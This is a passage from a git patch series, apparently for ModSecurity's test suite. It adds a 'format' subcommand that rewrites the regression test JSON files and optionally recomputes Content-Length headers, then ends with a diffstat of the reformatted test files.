(argc > i && strcmp(argv[i], "format") == 0) { + i++; + m_format = true; + } if (std::getenv("AUTOMAKE_TESTS")) { m_automake_output = true; } diff --git a/test/common/modsecurity_test.h b/test/common/modsecurity_test.h index e7a8b1b3e5..58faa13e95 100644 --- a/test/common/modsecurity_test.h +++ b/test/common/modsecurity_test.h @@ -35,7 +35,8 @@ template class ModSecurityTest : : m_test_number(0), m_automake_output(false), m_count_all(false), - m_test_multithreaded(false) { } + m_test_multithreaded(false), + m_format{false} { } std::string header(); void cmd_options(int, char **); @@ -50,6 +51,7 @@ template class ModSecurityTest : bool m_automake_output; bool m_count_all; bool m_test_multithreaded; + bool m_format; }; } // namespace modsecurity_test diff --git a/test/regression/regression.cc b/test/regression/regression.cc index ba37f76dfb..8ffdac5d4a 100644 --- a/test/regression/regression.cc +++ b/test/regression/regression.cc @@ -41,6 +41,7 @@ using modsecurity_test::CustomDebugLog; using modsecurity_test::ModSecurityTest; using modsecurity_test::ModSecurityTestResults; using modsecurity_test::RegressionTest; +using modsecurity_test::RegressionTests; using modsecurity_test::RegressionTestResult; using modsecurity::Utils::regex_search; @@ -436,6 +437,32 @@ int main(int argc, char **argv) return 0; #else test.cmd_options(argc, argv); + + if (test.m_format) { +#ifdef WITH_YAJL + std::cout << "start formatting test case JSON files" << std::endl; + ModSecurityTest test; + test.cmd_options(argc, argv); + test.load_tests(); + for (const auto &[name, tests] : test) { + std::ofstream ofs{name}; + if (!ofs.is_open()) { + std::cerr << "cannot open " << name << " for writing." << std::endl; + return 1; + } + ofs << tests[0]->toJSON(); + ofs.close(); + std::cout << "written formatted JSON to " << name << std::endl; + } + std::cout << "finished formatting files." << std::endl; + return 0; +#else + std::cout << "Test utility cannot format test case JSON files without being built with YAJL." \ + << std::endl; + return 1; +#endif + } + if (!test.m_automake_output && !test.m_count_all) { std::cout << test.header(); } diff --git a/test/regression/regression_test.cc b/test/regression/regression_test.cc index 8df1d1c035..1d9f1b8ac8 100644 --- a/test/regression/regression_test.cc +++ b/test/regression/regression_test.cc @@ -21,6 +21,10 @@ #include #include +#ifdef WITH_YAJL +#include +#endif + namespace modsecurity_test { std::string RegressionTest::print() { @@ -218,4 +222,235 @@ RegressionTest *RegressionTest::from_yajl_node(const yajl_val &node) { return u; } +RegressionTests *RegressionTests::from_yajl_node(const yajl_val &node) { + RegressionTests *u = new RegressionTests(node); + size_t num_tests = node->u.array.len; + for ( int i = 0; i < num_tests; i++ ) { + yajl_val obj = node->u.array.values[i]; + u->tests.emplace_back(*RegressionTest::from_yajl_node(obj)); + } + return u; +} + +RegressionTests::~RegressionTests() { +#ifdef WITH_YAJL + yajl_tree_free(node); +#endif +} + +#ifdef WITH_YAJL + +static yajl_gen_status jayl_gen_string_view(yajl_gen g, std::string_view s) { + return yajl_gen_string(g, reinterpret_cast(s.data()), s.length()); +} + +static yajl_gen_status jayl_gen_key_val(yajl_gen g, std::string_view key, std::string_view val) { + auto s = jayl_gen_string_view(g, key); + if (s != yajl_gen_status_ok) { + return s; + } + return jayl_gen_string_view(g, val); +} + +static yajl_gen_status copy_number(yajl_gen g, std::string_view key, yajl_val val) { + if (!YAJL_IS_NUMBER(val)) { + std::cerr << "error: " << key << " must be number.\n"; + exit(1); + } + auto s = jayl_gen_string_view(g, key); + if (s != yajl_gen_status_ok) { + return s; + } + return yajl_gen_number(g, + reinterpret_cast(val->u.number.r), + strlen(val->u.number.r)); +} + +static yajl_gen_status copy_string(yajl_gen g, std::string_view key, yajl_val val) { + if (!YAJL_IS_STRING(val)) { + std::cerr << "error: " << key << " must be string.\n"; + exit(1); + } + return jayl_gen_key_val(g, key, val->u.string); +} + +static void ensure_obj(std::string_view key, yajl_val obj) { + if (!YAJL_IS_OBJECT(obj)) { + std::cerr << "error: " << key << " must be object.\n"; + exit(1); + } +} + +static void copy_str_map(yajl_gen g, std::string_view key, yajl_val val) { + if (!YAJL_IS_OBJECT(val)) { + std::cerr << "error: " << key << " must be object.\n"; + exit(1); + } + jayl_gen_string_view(g, key); + yajl_gen_map_open(g); + for (size_t i = 0; i < val->u.object.len; ++i) { + const char *key2 = val->u.object.keys[i]; + yajl_val val2 = val->u.object.values[i]; + copy_string(g, key2, val2); + } + yajl_gen_map_close(g); +} + +static void copy_str_array(yajl_gen g, std::string_view key, yajl_val val) { + if (!YAJL_IS_ARRAY(val)) { + std::cerr << "error: " << key << " must be array.\n"; + exit(1); + } + jayl_gen_string_view(g, key); + yajl_gen_array_open(g); + for (size_t i = 0; i < val->u.array.len; ++i) { + yajl_val val2 = val->u.array.values[i]; + if (!YAJL_IS_STRING(val2)) { + std::cerr << "error: array element of " << key << " must be string.\n"; + exit(1); + } + jayl_gen_string_view(g, val2->u.string); + } + yajl_gen_array_close(g); +} + +static void copy_body(yajl_gen g, std::string_view key, yajl_val val) { + if (YAJL_IS_STRING(val)) { + jayl_gen_key_val(g, key, val->u.string); + } else { + copy_str_array(g, key, val); + } +} + +std::string RegressionTests::toJSON() { + const unsigned char *buf; + size_t len; + yajl_gen g; + + g = yajl_gen_alloc(NULL); + if (g == NULL) { + return ""; + } + yajl_gen_config(g, yajl_gen_beautify, 1); + + if (!YAJL_IS_ARRAY(node)) { + std::cerr << "error: toplevel must be array.\n"; + exit(1); + } + + yajl_gen_array_open(g); + for (size_t i = 0; i < node->u.array.len; ++i) { + yajl_val test_obj = node->u.array.values[i]; + ensure_obj("test", test_obj); + yajl_gen_map_open(g); + for (size_t j = 0; j < test_obj->u.object.len; ++j) { + const char *key = test_obj->u.object.keys[j]; + yajl_val val = test_obj->u.object.values[j]; + if (strcmp(key, "enabled") == 0 + || strcmp(key, "version_min") == 0 + || strcmp(key, "version_max") == 0 + || strcmp(key, "github_issue") == 0) { + copy_number(g, key, val); + } else if (strcmp(key, "title") == 0 + || strcmp(key, "url") == 0 + || strcmp(key, "resource") == 0) { + copy_string(g, key, val); + } else if (strcmp(key, "client") == 0) { + ensure_obj("client", val); + jayl_gen_string_view(g, "client"); + yajl_gen_map_open(g); + for (size_t k = 0; k < val->u.object.len; ++k) { + const char *key2 = val->u.object.keys[k]; + yajl_val val2 = val->u.object.values[k]; + if (strcmp(key2, "ip") == 0) { + copy_string(g, key2, val2); + } else if (strcmp(key2, "port") == 0) { + copy_number(g, key2, val2); + } + } + yajl_gen_map_close(g); + } else if (strcmp(key, "server") == 0) { + ensure_obj("server", val); + jayl_gen_string_view(g, "server"); + yajl_gen_map_open(g); + for (size_t k = 0; k < val->u.object.len; ++k) { + const char *key2 = val->u.object.keys[k]; + yajl_val val2 = val->u.object.values[k]; + if (strcmp(key2, "ip") == 0 + || strcmp(key2, "hostname") == 0) { + copy_string(g, key2, val2); + } else if (strcmp(key2, "port") == 0) { + copy_number(g, key2, val2); + } + } + yajl_gen_map_close(g); + } else if (strcmp(key, "request") == 0) { + ensure_obj("request", val); + jayl_gen_string_view(g, "request"); + yajl_gen_map_open(g); + for (size_t k = 0; k < val->u.object.len; ++k) { + const char *key2 = val->u.object.keys[k]; + yajl_val val2 = val->u.object.values[k]; + if (strcmp(key2, "url") == 0 + || strcmp(key2, "method") == 0) { + copy_string(g, key2, val2); + } else if (strcmp(key2, "http_version") == 0) { + copy_number(g, key2, val2); + } else if (strcmp(key2, "headers") == 0) { + copy_str_map(g, key2, val2); + } else if (strcmp(key2, "body") == 0) { + copy_body(g, key2, val2); + } + } + yajl_gen_map_close(g); + } else if (strcmp(key, "response") == 0) { + ensure_obj("response", val); + jayl_gen_string_view(g, "response"); + yajl_gen_map_open(g); + for (size_t k = 0; k < val->u.object.len; ++k) { + const char *key2 = val->u.object.keys[k]; + yajl_val val2 = val->u.object.values[k]; + if (strcmp(key2, "protocol") == 0) { + copy_string(g, key2, val2); + } else if (strcmp(key2, "headers") == 0) { + copy_str_map(g, key2, val2); + } else if (strcmp(key2, "body") == 0) { + copy_body(g, key2, val2); + } + } + yajl_gen_map_close(g); + } else if (strcmp(key, "expected") == 0) { + ensure_obj("expected", val); + jayl_gen_string_view(g, "expected"); + yajl_gen_map_open(g); + for (size_t k = 0; k < val->u.object.len; ++k) { + const char *key2 = val->u.object.keys[k]; + yajl_val val2 = val->u.object.values[k]; + if (strcmp(key2, "audit_log") == 0 + || strcmp(key2, "debug_log") == 0 + || strcmp(key2, "error_log") == 0 + || strcmp(key2, "redirect_url") == 0 + || strcmp(key2, "parser_error") == 0) { + copy_string(g, key2, val2); + } else if (strcmp(key2, "http_code") == 0) { + copy_number(g, key2, val2); + } + } + yajl_gen_map_close(g); + } else if (strcmp(key, "rules") == 0) { + copy_str_array(g, key, val); + } + } + yajl_gen_map_close(g); + } + yajl_gen_array_close(g); + + yajl_gen_get_buf(g, &buf, &len); + std::string s{reinterpret_cast(buf), len}; + yajl_gen_free(g); + return s; +} + +#endif // WITH_YAJL + } // namespace modsecurity_test diff --git a/test/regression/regression_test.h b/test/regression/regression_test.h index eb37986723..4444d9352e 100644 --- a/test/regression/regression_test.h +++ b/test/regression/regression_test.h @@ -78,6 +78,19 @@ class RegressionTest { std::string redirect_url; }; +class RegressionTests { + public: + RegressionTests(const yajl_val &node) : node{node} {} + ~RegressionTests(); + static RegressionTests *from_yajl_node(const yajl_val &); + std::string toJSON(); + + std::string filename; + std::string name; + + std::vector tests; + const yajl_val node; +}; class RegressionTestResult { public: From 488370c30a6f135c2863ae33b9fdcfd945bfbe7b Mon Sep 17 00:00:00 2001 From: Hiroaki Nakamura Date: Mon, 26 Jan 2026 05:53:39 +0900 Subject: [PATCH 05/29] Modify RegressionTest and use it for output formatted JSON --- test/common/modsecurity_test.cc | 4 +- test/regression/regression_test.cc | 279 ++++++++++++----------------- test/regression/regression_test.h | 14 +- 3 files changed, 125 insertions(+), 172 deletions(-) diff --git a/test/common/modsecurity_test.cc b/test/common/modsecurity_test.cc index 73406cdd89..1bc2d43bf7 100644 --- a/test/common/modsecurity_test.cc +++ b/test/common/modsecurity_test.cc @@ -84,10 +84,10 @@ bool ModSecurityTest::load_test_json(const std::string &file) { const auto key = u->filename + ":" + u->name; (*this)[key].push_back(std::move(u)); } - - yajl_tree_free(node); } + yajl_tree_free(node); + return true; } diff --git a/test/regression/regression_test.cc b/test/regression/regression_test.cc index 1d9f1b8ac8..a6d4b7f0b3 100644 --- a/test/regression/regression_test.cc +++ b/test/regression/regression_test.cc @@ -162,6 +162,7 @@ RegressionTest *RegressionTest::from_yajl_node(const yajl_val &node) { } if (strcmp(key2, "body") == 0) { u->request_body = yajl_array_to_str(val2); + u->request_body_lines = yajl_array_to_vec_str(val2); } } } @@ -175,6 +176,7 @@ RegressionTest *RegressionTest::from_yajl_node(const yajl_val &node) { } if (strcmp(key2, "body") == 0) { u->response_body = yajl_array_to_str(val2); + u->response_body_lines = yajl_array_to_vec_str(val2); } if (strcmp(key2, "protocol") == 0) { u->response_protocol = YAJL_GET_STRING(val2); @@ -214,6 +216,7 @@ RegressionTest *RegressionTest::from_yajl_node(const yajl_val &node) { si << keyj << "\n"; } u->rules = si.str(); + u->rules_lines = yajl_array_to_vec_str(val); } } @@ -223,7 +226,7 @@ RegressionTest *RegressionTest::from_yajl_node(const yajl_val &node) { } RegressionTests *RegressionTests::from_yajl_node(const yajl_val &node) { - RegressionTests *u = new RegressionTests(node); + RegressionTests *u = new RegressionTests(); size_t num_tests = node->u.array.len; for ( int i = 0; i < num_tests; i++ ) { yajl_val obj = node->u.array.values[i]; @@ -232,94 +235,82 @@ RegressionTests *RegressionTests::from_yajl_node(const yajl_val &node) { return u; } -RegressionTests::~RegressionTests() { -#ifdef WITH_YAJL - yajl_tree_free(node); -#endif -} - #ifdef WITH_YAJL -static yajl_gen_status jayl_gen_string_view(yajl_gen g, std::string_view s) { +static yajl_gen_status gen_string_view(yajl_gen g, std::string_view s) { return yajl_gen_string(g, reinterpret_cast(s.data()), s.length()); } -static yajl_gen_status jayl_gen_key_val(yajl_gen g, std::string_view key, std::string_view val) { - auto s = jayl_gen_string_view(g, key); - if (s != yajl_gen_status_ok) { +static yajl_gen_status gen_key_str(yajl_gen g, std::string_view key, std::string_view val) { + if (auto s{gen_string_view(g, key)}; s != yajl_gen_status_ok) { return s; } - return jayl_gen_string_view(g, val); + return gen_string_view(g, val); } -static yajl_gen_status copy_number(yajl_gen g, std::string_view key, yajl_val val) { - if (!YAJL_IS_NUMBER(val)) { - std::cerr << "error: " << key << " must be number.\n"; - exit(1); +static yajl_gen_status gen_key_str_if_non_empty(yajl_gen g, std::string_view key, std::string_view val) { + if (val.empty()) { + return yajl_gen_status_ok; } - auto s = jayl_gen_string_view(g, key); - if (s != yajl_gen_status_ok) { + return gen_key_str(g, key, val); +} + +static yajl_gen_status gen_key_int(yajl_gen g, std::string_view key, int val) { + if (auto s{gen_string_view(g, key)}; s != yajl_gen_status_ok) { return s; } - return yajl_gen_number(g, - reinterpret_cast(val->u.number.r), - strlen(val->u.number.r)); + return yajl_gen_integer(g, val); } -static yajl_gen_status copy_string(yajl_gen g, std::string_view key, yajl_val val) { - if (!YAJL_IS_STRING(val)) { - std::cerr << "error: " << key << " must be string.\n"; - exit(1); +static yajl_gen_status gen_key_opt_int(yajl_gen g, std::string_view key, std::optional val) { + if (!val) { + return yajl_gen_status_ok; } - return jayl_gen_key_val(g, key, val->u.string); + return gen_key_int(g, key, val.value()); } -static void ensure_obj(std::string_view key, yajl_val obj) { - if (!YAJL_IS_OBJECT(obj)) { - std::cerr << "error: " << key << " must be object.\n"; - exit(1); +static yajl_gen_status gen_key_int_if_non_zero(yajl_gen g, std::string_view key, int val) { + if (val == 0) { + return yajl_gen_status_ok; } + return gen_key_int(g, key, val); } -static void copy_str_map(yajl_gen g, std::string_view key, yajl_val val) { - if (!YAJL_IS_OBJECT(val)) { - std::cerr << "error: " << key << " must be object.\n"; - exit(1); - } - jayl_gen_string_view(g, key); - yajl_gen_map_open(g); - for (size_t i = 0; i < val->u.object.len; ++i) { - const char *key2 = val->u.object.keys[i]; - yajl_val val2 = val->u.object.values[i]; - copy_string(g, key2, val2); +static yajl_gen_status gen_key_number(yajl_gen g, std::string_view key, std::string_view raw_val) { + if (auto s{gen_string_view(g, key)}; s != yajl_gen_status_ok) { + return s; } - yajl_gen_map_close(g); + return yajl_gen_number(g, reinterpret_cast(raw_val.data()), raw_val.length()); } -static void copy_str_array(yajl_gen g, std::string_view key, yajl_val val) { - if (!YAJL_IS_ARRAY(val)) { - std::cerr << "error: " << key << " must be array.\n"; - exit(1); +static yajl_gen_status gen_key_str_array(yajl_gen g, std::string_view key, const std::vector &lines) { + if (auto s{gen_string_view(g, key)}; s != yajl_gen_status_ok) { + return s; } - jayl_gen_string_view(g, key); - yajl_gen_array_open(g); - for (size_t i = 0; i < val->u.array.len; ++i) { - yajl_val val2 = val->u.array.values[i]; - if (!YAJL_IS_STRING(val2)) { - std::cerr << "error: array element of " << key << " must be string.\n"; - exit(1); + if (auto s{yajl_gen_array_open(g)}; s != yajl_gen_status_ok) { + return s; + } + for (const auto &line : lines) { + if (auto s{gen_string_view(g, line)}; s != yajl_gen_status_ok) { + return s; } - jayl_gen_string_view(g, val2->u.string); } - yajl_gen_array_close(g); + return yajl_gen_array_close(g); } -static void copy_body(yajl_gen g, std::string_view key, yajl_val val) { - if (YAJL_IS_STRING(val)) { - jayl_gen_key_val(g, key, val->u.string); - } else { - copy_str_array(g, key, val); +static yajl_gen_status gen_key_headers(yajl_gen g, std::string_view key, const std::vector> &headers) { + if (auto s{gen_string_view(g, key)}; s != yajl_gen_status_ok) { + return s; + } + if (auto s{yajl_gen_map_open(g)}; s != yajl_gen_status_ok) { + return s; + } + for (const auto &header : headers) { + if (auto s{gen_key_str(g, header.first, header.second)}; s != yajl_gen_status_ok) { + return s; + } } + return yajl_gen_map_close(g); } std::string RegressionTests::toJSON() { @@ -332,115 +323,73 @@ std::string RegressionTests::toJSON() { return ""; } yajl_gen_config(g, yajl_gen_beautify, 1); - - if (!YAJL_IS_ARRAY(node)) { - std::cerr << "error: toplevel must be array.\n"; - exit(1); - } + yajl_gen_config(g, yajl_gen_indent_string, " "); yajl_gen_array_open(g); - for (size_t i = 0; i < node->u.array.len; ++i) { - yajl_val test_obj = node->u.array.values[i]; - ensure_obj("test", test_obj); + for (const auto & test : tests) { yajl_gen_map_open(g); - for (size_t j = 0; j < test_obj->u.object.len; ++j) { - const char *key = test_obj->u.object.keys[j]; - yajl_val val = test_obj->u.object.values[j]; - if (strcmp(key, "enabled") == 0 - || strcmp(key, "version_min") == 0 - || strcmp(key, "version_max") == 0 - || strcmp(key, "github_issue") == 0) { - copy_number(g, key, val); - } else if (strcmp(key, "title") == 0 - || strcmp(key, "url") == 0 - || strcmp(key, "resource") == 0) { - copy_string(g, key, val); - } else if (strcmp(key, "client") == 0) { - ensure_obj("client", val); - jayl_gen_string_view(g, "client"); - yajl_gen_map_open(g); - for (size_t k = 0; k < val->u.object.len; ++k) { - const char *key2 = val->u.object.keys[k]; - yajl_val val2 = val->u.object.values[k]; - if (strcmp(key2, "ip") == 0) { - copy_string(g, key2, val2); - } else if (strcmp(key2, "port") == 0) { - copy_number(g, key2, val2); - } - } - yajl_gen_map_close(g); - } else if (strcmp(key, "server") == 0) { - ensure_obj("server", val); - jayl_gen_string_view(g, "server"); - yajl_gen_map_open(g); - for (size_t k = 0; k < val->u.object.len; ++k) { - const char *key2 = val->u.object.keys[k]; - yajl_val val2 = val->u.object.values[k]; - if (strcmp(key2, "ip") == 0 - || strcmp(key2, "hostname") == 0) { - copy_string(g, key2, val2); - } else if (strcmp(key2, "port") == 0) { - copy_number(g, key2, val2); - } - } - yajl_gen_map_close(g); - } else if (strcmp(key, "request") == 0) { - ensure_obj("request", val); - jayl_gen_string_view(g, "request"); - yajl_gen_map_open(g); - for (size_t k = 0; k < val->u.object.len; ++k) { - const char *key2 = val->u.object.keys[k]; - yajl_val val2 = val->u.object.values[k]; - if (strcmp(key2, "url") == 0 - || strcmp(key2, "method") == 0) { - copy_string(g, key2, val2); - } else if (strcmp(key2, "http_version") == 0) { - copy_number(g, key2, val2); - } else if (strcmp(key2, "headers") == 0) { - copy_str_map(g, key2, val2); - } else if (strcmp(key2, "body") == 0) { - copy_body(g, key2, val2); - } - } - yajl_gen_map_close(g); - } else if (strcmp(key, "response") == 0) { - ensure_obj("response", val); - jayl_gen_string_view(g, "response"); - yajl_gen_map_open(g); - for (size_t k = 0; k < val->u.object.len; ++k) { - const char *key2 = val->u.object.keys[k]; - yajl_val val2 = val->u.object.values[k]; - if (strcmp(key2, "protocol") == 0) { - copy_string(g, key2, val2); - } else if (strcmp(key2, "headers") == 0) { - copy_str_map(g, key2, val2); - } else if (strcmp(key2, "body") == 0) { - copy_body(g, key2, val2); - } - } - yajl_gen_map_close(g); - } else if (strcmp(key, "expected") == 0) { - ensure_obj("expected", val); - jayl_gen_string_view(g, "expected"); - yajl_gen_map_open(g); - for (size_t k = 0; k < val->u.object.len; ++k) { - const char *key2 = val->u.object.keys[k]; - yajl_val val2 = val->u.object.values[k]; - if (strcmp(key2, "audit_log") == 0 - || strcmp(key2, "debug_log") == 0 - || strcmp(key2, "error_log") == 0 - || strcmp(key2, "redirect_url") == 0 - || strcmp(key2, "parser_error") == 0) { - copy_string(g, key2, val2); - } else if (strcmp(key2, "http_code") == 0) { - copy_number(g, key2, val2); - } - } - yajl_gen_map_close(g); - } else if (strcmp(key, "rules") == 0) { - copy_str_array(g, key, val); - } + gen_key_int(g, "enabled", test.enabled); + gen_key_int(g, "version_min", test.version_min); + gen_key_opt_int(g, "version_max", test.version_max); + gen_key_str(g, "title", test.title); + gen_key_str_if_non_empty(g, "url", test.url); + gen_key_str_if_non_empty(g, "resource", test.resource); + gen_key_opt_int(g, "github_issue", test.github_issue); + + gen_string_view(g, "client"); + yajl_gen_map_open(g); + gen_key_str(g, "ip", test.clientIp); + gen_key_int(g, "port", test.clientPort); + yajl_gen_map_close(g); + + gen_string_view(g, "server"); + yajl_gen_map_open(g); + gen_key_str(g, "ip", test.serverIp); + gen_key_int(g, "port", test.serverPort); + yajl_gen_map_close(g); + + gen_string_view(g, "request"); + yajl_gen_map_open(g); + gen_key_headers(g, "headers", test.request_headers); + gen_key_str(g, "uri", test.uri); + gen_key_str(g, "method", test.method); + if (!test.httpVersion.empty()) { + gen_key_number(g, "http_version", test.httpVersion); + } + + auto request_body_lines{test.request_body_lines}; + if (request_body_lines.empty()) { + request_body_lines.push_back(""); + } + gen_key_str_array(g, "body", request_body_lines); + + yajl_gen_map_close(g); + + gen_string_view(g, "response"); + yajl_gen_map_open(g); + gen_key_headers(g, "headers", test.response_headers); + + auto response_body_lines{test.response_body_lines}; + if (response_body_lines.empty()) { + response_body_lines.push_back(""); } + gen_key_str_array(g, "body", response_body_lines); + + gen_key_str_if_non_empty(g, "protocol", test.response_protocol); + yajl_gen_map_close(g); + + gen_string_view(g, "expected"); + yajl_gen_map_open(g); + gen_key_str_if_non_empty(g, "audit_log", test.audit_log); + gen_key_str_if_non_empty(g, "debug_log", test.debug_log); + gen_key_str_if_non_empty(g, "error_log", test.error_log); + gen_key_int(g, "http_code", test.http_code); + gen_key_str_if_non_empty(g, "redirect_url", test.redirect_url); + gen_key_str_if_non_empty(g, "parser_error", test.parser_error); + yajl_gen_map_close(g); + + gen_key_str_array(g, "rules", test.rules_lines); + yajl_gen_map_close(g); } yajl_gen_array_close(g); diff --git a/test/regression/regression_test.h b/test/regression/regression_test.h index 4444d9352e..56d4497db6 100644 --- a/test/regression/regression_test.h +++ b/test/regression/regression_test.h @@ -22,6 +22,7 @@ #include #include #include +#include #ifndef TEST_REGRESSION_REGRESSION_TEST_H_ #define TEST_REGRESSION_REGRESSION_TEST_H_ @@ -43,8 +44,8 @@ class RegressionTest { std::string url; int enabled; int version_min; - int version_max; - int github_issue; + std::optional version_max; + std::optional github_issue; std::vector> request_headers; std::vector> response_headers; @@ -76,12 +77,16 @@ class RegressionTest { int http_code; std::string redirect_url; + + // fields for formatting JSON + + std::vector request_body_lines; + std::vector response_body_lines; + std::vector rules_lines; }; class RegressionTests { public: - RegressionTests(const yajl_val &node) : node{node} {} - ~RegressionTests(); static RegressionTests *from_yajl_node(const yajl_val &); std::string toJSON(); @@ -89,7 +94,6 @@ class RegressionTests { std::string name; std::vector tests; - const yajl_val node; }; class RegressionTestResult { From 37e1f133d72b75bbe2861d5d31fbc9495818061a Mon Sep 17 00:00:00 2001 From: Hiroaki Nakamura Date: Mon, 26 Jan 2026 06:23:22 +0900 Subject: [PATCH 06/29] Update content-length in regeression_tests format subcommand when UPDATE_CONTENT_LENGTH env var is set --- test/common/modsecurity_test.cc | 3 ++ test/common/modsecurity_test.h | 4 ++- test/regression/regression.cc | 3 ++ test/regression/regression_test.cc | 50 ++++++++++++++++++++++++++++++ test/regression/regression_test.h | 2 ++ 5 files changed, 61 insertions(+), 1 deletion(-) diff --git a/test/common/modsecurity_test.cc b/test/common/modsecurity_test.cc index 1bc2d43bf7..19cec4dc51 100644 --- a/test/common/modsecurity_test.cc +++ b/test/common/modsecurity_test.cc @@ -151,6 +151,9 @@ void ModSecurityTest::cmd_options(int argc, char **argv) { i++; m_format = true; } + if (std::getenv("UPDATE_CONTENT_LENGTH")) { + m_update_content_length = true; + } if (std::getenv("AUTOMAKE_TESTS")) { m_automake_output = true; } diff --git a/test/common/modsecurity_test.h b/test/common/modsecurity_test.h index 58faa13e95..bc8f138b3b 100644 --- a/test/common/modsecurity_test.h +++ b/test/common/modsecurity_test.h @@ -36,7 +36,8 @@ template class ModSecurityTest : m_automake_output(false), m_count_all(false), m_test_multithreaded(false), - m_format{false} { } + m_format{false}, + m_update_content_length{false} { } std::string header(); void cmd_options(int, char **); @@ -52,6 +53,7 @@ template class ModSecurityTest : bool m_count_all; bool m_test_multithreaded; bool m_format; + bool m_update_content_length; }; } // namespace modsecurity_test diff --git a/test/regression/regression.cc b/test/regression/regression.cc index 8ffdac5d4a..36030a3d4f 100644 --- a/test/regression/regression.cc +++ b/test/regression/regression.cc @@ -450,6 +450,9 @@ int main(int argc, char **argv) std::cerr << "cannot open " << name << " for writing." << std::endl; return 1; } + if (test.m_update_content_length) { + tests[0]->update_content_lengths(); + } ofs << tests[0]->toJSON(); ofs.close(); std::cout << "written formatted JSON to " << name << std::endl; diff --git a/test/regression/regression_test.cc b/test/regression/regression_test.cc index a6d4b7f0b3..da0615e653 100644 --- a/test/regression/regression_test.cc +++ b/test/regression/regression_test.cc @@ -20,6 +20,7 @@ #include #include #include +#include #ifdef WITH_YAJL #include @@ -225,6 +226,49 @@ RegressionTest *RegressionTest::from_yajl_node(const yajl_val &node) { return u; } +constexpr char ascii_tolower(char c) { + return 'A' <= c && c <= 'Z' ? (c + ('a' - 'A')) : c; +} + +bool iequals_ascii(std::string_view a, std::string_view b) { + return a.size() == b.size() && + std::equal(a.begin(), a.end(), b.begin(), b.end(), + [](char x, char y) { + return ascii_tolower(x) == ascii_tolower(y); + }); +} + +static bool has_chunked_header(const std::vector> &headers) { + for (const auto &header : headers) { + if (iequals_ascii(header.first, "Transfer-Encoding") && iequals_ascii(header.second, "chunked")) { + return true; + } + } + return false; +} + +static void update_content_length(std::vector> &headers, size_t length) { + if (has_chunked_header(headers)) { + return; + } + + bool has_content_length = false; + for (auto &header : headers) { + if (iequals_ascii(header.first, "Content-Length")) { + header.second = std::to_string(length); + has_content_length = true; + } + } + if (!has_content_length) { + headers.push_back(std::pair{"Content-Length", std::to_string(length)}); + } +} + +void RegressionTest::update_content_lengths() { + update_content_length(request_headers, request_body.size()); + update_content_length(response_headers, response_body.size()); +} + RegressionTests *RegressionTests::from_yajl_node(const yajl_val &node) { RegressionTests *u = new RegressionTests(); size_t num_tests = node->u.array.len; @@ -235,6 +279,12 @@ RegressionTests *RegressionTests::from_yajl_node(const yajl_val &node) { return u; } +void RegressionTests::update_content_lengths() { + for (auto & test : tests) { + test.update_content_lengths(); + } +} + #ifdef WITH_YAJL static yajl_gen_status gen_string_view(yajl_gen g, std::string_view s) { diff --git a/test/regression/regression_test.h b/test/regression/regression_test.h index 56d4497db6..6b483c7daf 100644 --- a/test/regression/regression_test.h +++ b/test/regression/regression_test.h @@ -83,11 +83,13 @@ class RegressionTest { std::vector request_body_lines; std::vector response_body_lines; std::vector rules_lines; + void update_content_lengths(); }; class RegressionTests { public: static RegressionTests *from_yajl_node(const yajl_val &); + void update_content_lengths(); std::string toJSON(); std::string filename; From 191dba923fb15366d558af1586dce5ce0c6a94e6 Mon Sep 17 00:00:00 2001 From: Hiroaki Nakamura Date: Mon, 26 Jan 2026 08:51:57 +0900 Subject: [PATCH 07/29] Format regression test JSON files by running the following command: ``` (cd test; ./regression_tests format) ``` --- test/test-cases/regression/action-allow.json | 157 +- test/test-cases/regression/action-block.json | 103 +- .../regression/action-ctl_audit_engine.json | 19 +- .../action-ctl_request_body_access.json | 177 +- .../action-ctl_request_body_processor.json | 257 +- ...ctl_request_body_processor_urlencoded.json | 134 +- .../regression/action-ctl_rule_engine.json | 462 +- .../action-ctl_rule_remove_by_id.json | 110 +- .../action-ctl_rule_remove_by_tag.json | 108 +- .../action-ctl_rule_remove_target_by_id.json | 309 +- .../action-ctl_rule_remove_target_by_tag.json | 166 +- .../regression/action-disruptive.json | 228 +- test/test-cases/regression/action-exec.json | 237 +- .../regression/action-expirevar.json | 216 +- test/test-cases/regression/action-id.json | 298 +- .../test-cases/regression/action-initcol.json | 52 +- test/test-cases/regression/action-msg.json | 172 +- test/test-cases/regression/action-setenv.json | 156 +- test/test-cases/regression/action-setrsc.json | 52 +- test/test-cases/regression/action-setsid.json | 52 +- test/test-cases/regression/action-setuid.json | 52 +- test/test-cases/regression/action-skip.json | 156 +- test/test-cases/regression/action-tag.json | 170 +- .../regression/action-tnf-base64.json | 102 +- test/test-cases/regression/action-xmlns.json | 217 +- test/test-cases/regression/actions.json | 164 +- test/test-cases/regression/auditlog.json | 205 +- .../collection-case-insensitive.json | 85 +- .../test-cases/regression/collection-lua.json | 428 +- ...llection-regular_expression_selection.json | 171 +- .../regression/collection-resource.json | 148 +- .../regression/collection-tx-with-macro.json | 364 +- test/test-cases/regression/collection-tx.json | 477 +- .../regression/config-body_limits.json | 943 +-- .../config-calling_phases_by_name.json | 109 +- .../regression/config-include-bad.json | 148 +- .../test-cases/regression/config-include.json | 480 +- .../regression/config-remove_by_id.json | 162 +- .../regression/config-remove_by_msg.json | 108 +- .../regression/config-remove_by_tag.json | 108 +- .../regression/config-response_type.json | 170 +- .../regression/config-secdefaultaction.json | 492 +- .../regression/config-secremoterules.json | 145 +- .../config-update-action-by-id.json | 410 +- .../config-update-target-by-id.json | 285 +- .../config-update-target-by-msg.json | 51 +- .../config-update-target-by-tag.json | 465 +- .../config-xml_external_entity.json | 181 +- test/test-cases/regression/debug_log.json | 28 +- .../regression/directive-sec_rule_script.json | 351 +- .../test-cases/regression/fn-setHostname.json | 46 +- test/test-cases/regression/issue-1152.json | 68 +- test/test-cases/regression/issue-1528.json | 80 +- test/test-cases/regression/issue-1565.json | 159 +- test/test-cases/regression/issue-1576.json | 153 +- test/test-cases/regression/issue-1591.json | 245 +- test/test-cases/regression/issue-1725.json | 84 +- test/test-cases/regression/issue-1743.json | 156 +- test/test-cases/regression/issue-1785.json | 17 +- test/test-cases/regression/issue-1812.json | 20 +- test/test-cases/regression/issue-1825.json | 441 +- test/test-cases/regression/issue-1831.json | 82 +- test/test-cases/regression/issue-1844.json | 307 +- test/test-cases/regression/issue-1850.json | 17 +- test/test-cases/regression/issue-1941.json | 139 +- test/test-cases/regression/issue-1943.json | 49 +- test/test-cases/regression/issue-1956.json | 292 +- test/test-cases/regression/issue-1960.json | 47 +- test/test-cases/regression/issue-2000.json | 54 +- test/test-cases/regression/issue-2099.json | 